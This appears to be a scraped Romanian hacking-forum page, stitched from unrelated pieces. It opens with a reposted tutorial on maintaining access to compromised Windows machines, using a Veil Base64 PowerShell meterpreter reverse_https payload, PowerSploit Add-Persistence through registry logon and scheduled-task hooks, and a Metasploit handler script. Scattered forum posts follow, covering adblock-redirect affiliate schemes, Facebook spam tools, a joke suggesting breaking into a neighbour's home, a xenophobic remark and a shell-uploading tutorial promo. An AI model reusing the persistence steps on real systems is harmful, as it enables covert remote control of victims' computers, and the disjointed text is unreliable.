C:\Windows\System32\WindowsPowerShell\v1.0\Modules\PowerSploit-master\PowerSploit-master\Persistence\Persistence.psm1? [D] Do not run [R] Run once Suspend [?] Help (default is "D"): R ---- Generating the Veil Payload The following series of screenshots will provide the details to generate a .bat scriptcontaining an embedded Base64 encoded PowerShell meterpreter payload. Thewindows/meterpreter/reverse_https payload was used during this scenario considering it offers an inherent level of persistence in and of itself while also increasing the probability that an HTTP based payload will be allowed outbound. Also note that thepowershell/VirtualAlloc method is used as it allows for inline shellcode injection. Finally, we are presented with the .bat file containing the Base64 encoded payloads applicable to both 32 and 64 arch types. We need to copy out the entire Base64 value to be used later within PowerSploit. Note that we obviously don’t care which of the Base64 values we copy, since both of the payloads are identical. The wrapper shell script is simply providing the conditional required to identify arch types. Generating the PowerSploit Payload This section is based on Matt Graeber’s PowerSploit article and is well worth the read. The motivation for providing this blog post was to illustrate how to leverage the inclusion of Veil payloads in conjunction with Matt’s technique. Getting back on task, on the Windows 7 (64 Arch) system, we need to ensure that we are still in the PowerShell scripting environment. Again we can enter the environment by typing the following within a privileged command shell and change directory to the location of the PowerShell modules. C:\Users\labrat>powershell Windows PowerShell Copyright (C) 2009 Microsoft Corporation. All rights reserved. PS C:\Users\labrat> PS C:\Users\labrat> cd C:\Windows\System32\WindowsPowerShell\v1.0\Modules\PowerSploit-master\PowerSploit-master PS C:\Windows\System32\WindowsPowerShell\v1.0\Modules\PowerSploit-master\PowerSploit-master> Now we can create an arbitrary variable and assign the necessary value to it. The following example provides a stub for a variable assignment that can be used by simply plugging in our previously copied Base64 Veil payload. $p = {iex $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String("VEIL_PAYLOAD_HERE")))), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd()} The following uses our Veil payload, and represents an actual assignment. We can now set a couple of additional arbitrary variable values that will define both non-privileged and privileged persistence methods, respectively. The first definition will run the persistence script upon each successful logon. The second, considering we have gain privileged access to the victim system, will run the persistence script each day at 10:00 AM. $u = New-UserPersistenceOptions -Registry –AtLogon $e = New-ElevatedPersistenceOptions -ScheduledTask -Daily -At '10:00 AM' Finally, we need to generate the persistence script using the PowerSploit “Add-Persistence” module. PS C:\Windows\System32\WindowsPowerShell\v1.0\Modules\PowerSploit-master\PowerSploit-master\Persistence> Add-Persistence -ScriptBlock $p -UserPersistenceOptions $u -ElevatedPersistenceOptions $e -Verbose -PassThru This should generate two files outputted to the same directory. The Persistence.ps1 andRemovePersistence.ps1 files should be self-explanatory but are simply used to enable persistence and remove persistence. PS C:\Windows\System32\WindowsPowerShell\v1.0\Modules\PowerSploit-master\PowerSploit-master\Persistence> ls Directory: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\PowerSploit-master\PowerSploit-master\Persistence Mode LastWriteTime Length Name ---- ------------- ------ ---- -a--- 12/4/2013 11:19 AM 16025 Add-Persistence.ps1 -a--- 12/4/2013 11:19 AM 5140 New-ElevatedPersistenceOptions.ps1 -a--- 12/4/2013 11:19 AM 3555 New-UserPersistenceOptions.ps1 -a--- 12/4/2013 5:29 PM 7128 Persistence.ps1 -a--- 12/4/2013 11:19 AM 1104 Persistence.psd1 -a--- 12/4/2013 11:19 AM 170 Persistence.psm1 -a--- 12/4/2013 5:29 PM 514 RemovePersistence.ps1 -a--- 12/4/2013 11:19 AM 583 Usage.md Profit After all of this, we are set to actually profit from all of our effort. At this point, the victim system is in a state of initial exploitation as the following screenshot illustrates. We now need to upload our newly generated PowerShell script so that we can maintain persistence. Similar to what we did on the Windows 7 (64 Arch) system, we need to ensure that the victim machine can run PowerShell scripts by explicitly defining the Set-ExecutionPolicy Unrestricted policy. However, if we drop into command shell from within meterpreter, then the only available shell is non-interactive. Fortunately, Microsoft has afforded us the ability to set the policy using a non-interactive method from within the command line. A word of mention, we are using a separate multi-handler during these examples as opposed to the inherent handler invoked for a specific exploit payload. The following configuration was used within a MetaSploit resource script and started from the msfconsole as follows. Save this to a file called reversehttps.rc use exploit/multi/handler set PAYLOAD windows/meterpreter/reverse_https set LHOST 0.0.0.0 set LPORT 8443 set ExitOnSession false exploit -j –z Invoke the script using: Msfconsole –r reversehttps.rc Returning to the example, we can now move our new Persistence.ps1 script from the Windows 7 (64 Arch) system over to the Kali Linux system. Then we will use the post-exexec_powershell module to upload our Persistence.ps1 script via the existing meterpreter session as the following screenshot illustrates. The successful execution of the Persistence.ps1 should execute cleanly without returning any syntax errors. Note that the following screenshot had returned multiple meterpreter sessions since the Windows 7 (32 Arch) victim system was rebooted and logged back into.Furthermore, there were multiple instances of the persistence script staged on the victim resulting in the persistent connections. If everything worked correctly, persistence should be working as expected. You can obviously test this in a controlled environment by re-authenticating the victim user, which should invoke a new meterpreter session. The process of removing persistence is as simple as copying the RemovePersistence.ps1script from the Windows 7 (64 Arch) system to the Kali Linux system and running the script using the MetaSploit exec_powershell module. CONTACT INFO Name: Chris Patten Sursa: https://www.fishnetsecurity.com/6labs/blog/how-post-ex-persistence-scripting-powersploit-veil

Nu se merita, o sa iti iei foarte rapid ban pe facebook.

Faci o verificare daca user-ul are adblock pe browser, de acolo ii dai redirect spre ce vrei tu. Iar $$$$ vin de pe afiliere, desi sunt slabe sanse sa obtii conversii din traficul de pe tube. Eu am folosit chaturbate si awempire si sunt ok. Iar reclame popads / plugrush. Embed de pe site-uri porn mari (redtube, ...). Salut, te rog sa iti stergi link-urile cu refferal.

Exista per categorie. Vezi dreapta jos cand intri pe o categorie. Nu exista pentru tot forumul, le-am zis dar o sa dureze pana o sa bage, daca o sa bage. Ma gandeam sa fac eu, dar chiar nu am timp si chef...

De pe alte site-uri!

Singura metoda , insa nu e 100% sigura este sa cauti folderul unde ai instalat samp-ul , il selectezi , apesi shift+delete iar apoi ENTER imediat. Stiu pe cineva (askwrite) care juca metin2 si a functionat metoda la el.

Can you please post like a normal human being? Maybe in India people like all the flashy colours, sizes and fonts but here it's not India.

@rectisor Pentru a depune cât mai putin efort,urm?re?te-?i vecinul când pleac? de acas?,?i sparge-i u?a ca ?ie mai u?or

nu e vorba de asta , ideea e ca vanzarile in online reprezinta maxim 15% , restul pe magazine tata , taranii care fac rate , vor sa pipaie produsu` etc etc mai avem mult timp pana sa ne educam si noi .

Asta a-ti vrut cu asta v-ati rasfatat cu PUIE MONTA si toate manipularile pe facebook si acum va tras-o CIOLANU dacian ciolos si cu neamtu KLAUS de la PNL acum mancati doar CIOLOS fara carne la breloc afumat si nemtii va transmit:

Shell Uploading Best methods Tutorials-By Spirit Hello guys i am Spirited wolf and today i am here to give tutorial on shell uploading and bypass in different senerious. Hope you will like it. And please! Subscribe my channel to get the notification of upcomming Tutorial's Upload shell after doing sqli- By Spirit Uploading shell with sqli command-By Spirit Advanced way to upload your shell Tutorial-By Spirit Bypass file(mostly shell) upload tutorial-By spirit ------------------------------------------------------------------------------------------------------------ This tutorial is for educational purpose only. I'll not responsible for any harm. ------------------------------------------------------------------------------------------------------------ Use your skills to protect other not to harm kiki emoticon Thanks for watching guys and keep watching pentesting with spirit Our youtube Channel link:: https://www.youtube.com/c/Pentestingwithspirit Facebook page link:: http://facebook.com/Pentest.with.spirit1 Twitter account:: @spirit3113

Aiurea, sistemu de reputatie e pervers si nu mai avem 'Mata-i grasa' si mai multe dezavantaje totusi sa speram ca o sa se intample ca inainte, nu de alta dar mai de graba as prefera un backup RST decat o admosfera extreamcs... Si totusi... unde a disparut al nostru 'Mata-i grasa' PS: Daca tot ramanem pe ipb, macar implementati un hide/show pentru sidebaru ala de pe dreapta cu topics si posts... PS: Pfff... nu uitati de rank-uri

Saptamana trecuta mi-am inregistrat eu 2 domenii + host, si nu am trimis nimic, dar am avut IP de Italia, si numar de telefon

Ai premium? si merge? ca nu cred ca e posibil sa treaca un cacat de plugin de securitatea de spam de la facebook, mai mult de 100-200 de mesaje intr-o ora nu cred ca trimite //nu merge nici macar sa functia free de dat like-uri, nu da like-uri cum trebuie da doar la o parte dai refresh dispar si alea dupa ceva timp It looks like you were misusing this feature by going too fast. You’ve been blocked from using it. Learn more about blocks in the ... If you think you're seeing this by mistake, please ....